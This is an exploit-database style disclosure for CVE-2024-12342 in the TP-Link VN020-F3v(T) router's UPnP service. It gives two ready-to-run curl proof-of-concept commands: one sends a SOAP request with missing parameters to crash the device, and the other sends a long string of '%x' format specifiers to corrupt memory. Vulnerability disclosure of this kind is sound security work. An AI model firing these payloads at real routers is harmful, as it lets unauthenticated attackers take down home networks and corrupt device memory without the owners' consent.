# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
# Date: 10/22/2024
# Exploit Author: Mohamed Maatallah
# Vendor Homepage: https://www.tp-link.com
# Version: TT_V6.2.1021 (VN020-F3v(T))
# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
# CVE: CVE-2024-12342


Description:
Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
UPnP implementation, affecting the WANIPConnection service. The
vulnerabilities allow unauthenticated attackers to cause denial of service
and potential memory corruption through malformed SOAP requests.

Proof of Concept 1 (Missing Parameters DoS):

curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:AddPortMapping>
<NewPortMappingDescription>hello</NewPortMappingDescription>
</u:AddPortMapping></s:Body></s:Envelope>'

Proof of Concept 2 (Memory Corruption):

curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
     -H "Content-Type: text/xml" \
     -H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
     -d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:SetConnectionType
xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewConnectionType>'"$(perl -e 'print "%x" x
10000;')"'</NewConnectionType>
    </u:SetConnectionType>
  </s:Body>
</s:Envelope>'